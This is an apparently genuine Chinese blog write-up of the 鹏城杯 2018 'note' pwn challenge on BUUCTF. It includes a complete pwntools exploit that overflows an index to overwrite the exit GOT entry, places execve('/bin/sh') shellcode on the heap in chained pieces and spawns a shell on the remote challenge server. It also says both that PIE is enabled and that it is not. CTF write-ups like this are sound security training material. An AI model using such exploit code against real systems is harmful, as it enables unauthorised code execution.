鹏城杯_2018_note

已于 2023-11-05 11:31:07 修改
阅读量104 收藏
点赞数
分类专栏: # 每日一“胖“ 文章标签: pwn
于 2023-11-05 11:26:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134228050
版权

查看保护,就开了 PIE:

漏洞点:

buf 存在溢出,刚好可以溢出到 idx,而且没有开 PIE 和 FULL RELRO,所以可以修改 idx 去修改相关 got 表项。

然后我就没啥思路了,因为在我的本地环境堆上是没有可执行权限的,然后去网上搜了一下,发现其都说堆上有可执行权限。然后看了下 buu 给的是 ubu18,所以应该是环境的问题,远程堆上应该有可执行权限。 

利用方式:

修改 exit got 表为堆上地址,然后往堆上写入 shellcode,由于写入字节有限,所以 shellcode 得分段写入,exp 如下:

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

#io = process("./pwn")
io = remote("node4.buuoj.cn", 29116)
elf = ELF("./pwn")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b''

def add(idx, size, data):
        sl(b'1')
        sleep(0.02)
        sl(byte(idx))
        sleep(0.02)
        sl(size)
        sleep(0.02)
        sl(data)
        sleep(0.01)

pay = b'13'.ljust(10, b'\x00') + p32(0xFFFFFFF8)

shellcode = asm("""
        mov rax,0x0068732f6e69622f
        jmp $+0x16
""")

info("shellcode len", len(shellcode))
add(0, pay, shellcode)

shellcode = asm("""
        push rax
        mov rdi, rsp
        xor rsi, rsi
        jmp $+0x19
""")
info("shellcode len", len(shellcode))
add(1, b'13\x00', shellcode)

shellcode = asm("""
        xor rdx, rdx
        mov rax, 0x3b
        syscall
""")
info("shellcode len", len(shellcode))
add(2, b'13\x00', shellcode)

sl(b'5')

#debug()
sh()

远程可以通,而本地堆上无可执行权限,所以打不通:

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[鹏城杯 2022]Misc_water
m0_64444909的博客
03-19 282
这里的CRC指的是CRC32,也就是PNG图片的一个效验位,是一种不可逆运算,类似于MD5,作为数据效验或效验文件的完整性使用。(1). png的文件头:8个字节为 png的文件头(固定)(2). 4个字节十进制为13,代表头部数据块的长度为13(3). 4个字节ASCII码为IHDR,表明数据块为IHDR(4). 接下来是13位数据块(IHDR)前四个字节代表该图片的宽(不固定,可变)后四个字节代表该图片的高(不固定,可变)
181202 逆向-2018鹏城
whklhhhh的博客
12-02 1443
本次比赛的各个Re题目都对各种公开密码算法的运用考察比较多,还是挺有意思的~ Reverse badblock main函数打开发现是C++写的,充斥大量无用代码 于是转头执行,发现接收输入后回弹err... 搜索字符串发现有三处引用 分别是两个anti_debug和一个puts_wrong anti_debug分别通过ptrace和getpid()的方法,不必多说,调试的时候直接绕过即可 put...
BUUCTF pwn 鹏城杯_2018_code
热门推荐
stareforever的博客
12-28 2万+
查看保护 程序流程 先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数 check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’; 另一个函数要求如下结果 这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律) 相应的结果如下 可以发现结果是递增的,并且 那么可以猜测进行测试 确定第一个为w,后面以从类推 那么输入‘wyBTs’即可成功通过检测 进入到have_fu
[BUUCTF-pwn] 鹏城杯_2018_overint
weixin_52640415的博客
02-08 851
老大的帽儿。题目分3部分,第1部分要求输入4个字节这4个字节经过运算得35 __int64 __fastcall sub_4007D1(__int64 a1, int a2) { int v3; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] v3 = 0; for ( i = 1; i < a2; ++i ) { printf("v[i] is %d\n", (unsigned int)*(char *)(i +
鹏城杯_2018_treasure
xy1458214551的博客
11-30 36
buuctf上的鹏城杯_2018_treasure题解
[BUUCTF-pwn] 鹏城杯_2018_easycalc
weixin_52640415的博客
02-09 304
保护基本全开,在add时有个off_by_null漏洞。fd位置只能修改。 unsigned __int64 m1add() { unsigned int v0; // ebx unsigned int v2; // [rsp+4h] [rbp-2Ch] BYREF size_t size; // [rsp+8h] [rbp-28h] BYREF __int64 v4; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp
[鹏城杯 2022] baby_re
fa1c4的blog
07-20 370
鹏城杯 2022 baby_re 补题
2022鹏城
unexpectedthing的博客
08-30 2271
2022鹏城
鹏程杯2018 Pwn Writeup
Kaller的博客
12-05 1458
PWN  code   hash爆破(By:Apeng师傅): 得到wyBTs。 这里栈溢出,控制 ret后,“pop rdi ret”用来调用call。 1.leak_libc 把puts的got.plt表用puts函数输出 2.计算偏移,得到system和字符串/bin/sh 3.调用system。 from pwn import * context.log...
鹏城杯-2018-note
11-05
附件
鹏城杯”网络安全竞赛开赛 复现真实网络靶场环境.pdf
09-20
鹏城杯”网络安全竞赛开赛 复现真实网络靶场环境.pdf
jmeter _report.zip
04-08
《JMeter 报告优化详解》 在性能测试领域,Apache JMeter 是一款广泛应用的开源工具,用于模拟用户负载并评估服务器性能。本篇文章将详细探讨如何通过优化JMeter生成的报告,提升用户体验,使测试结果更加直观易读...
鹏城网安卓手机apk客户端
12-31
鹏城网是深圳最大的旅游门户网,深圳旅游,深圳景点门票,深圳一日游团购就上鹏城网,深圳旅游网涵盖深圳新闻,娱乐八卦,深圳旅游攻略,深圳同城活动,深圳公益活动,深圳打折信息,深圳美食推荐,深圳交友,深圳户外活动等....
鹏城智能体城市安全发展白皮书
06-14
鹏城智能体城市安全发展白皮书,精品一级
磁力链磁力链磁力链.txt
最新发布
07-22
磁力链
“人力资源+大数据+薪酬报告+涨薪调薪”
07-22
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
安装graphviz和pygraphviz
07-22
pygraphviz 是一个Python库,它是Graphviz图形可视化软件的Python接口。Graphviz是一个开源的图形可视化软件,广泛用于创建和编辑有向图和无向图。pygraphviz使得Python开发者能够轻松地创建和操作图形,以及执行图形的布局和可视化。 一、pygraphviz的主要功能 创建和编辑图形:pygraphviz允许开发者通过Python代码来创建图形,包括添加节点、边等元素,并且可以编辑这些元素的属性,如颜色、形状、标签等。 图形布局:pygraphviz支持多种图形布局算法,如dot、neato、circo等,开发者可以根据需要选择合适的算法来优化图形的布局。 图形可视化:pygraphviz可以将创建和编辑好的图形保存为图片文件,支持多种图片格式,如PNG、JPEG等,方便开发者进行展示和分享。
BrainF**k Devlopment Toolkit
07-22
BrainF**k Devlopment Toolkit(BFDTK),可用于开发BrainF**k程序。
[鹏城杯 2022]简单的php
11-04
鹏城杯是一个编程比赛,2022年的题目是关于简单的PHP编程。PHP是一种常用的服务器端脚本语言,用于开发动态网站和Web应用程序。 在这个比赛中,参赛者需要用PHP编写一个简单的程序。程序的要求可能包括输入一个数字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值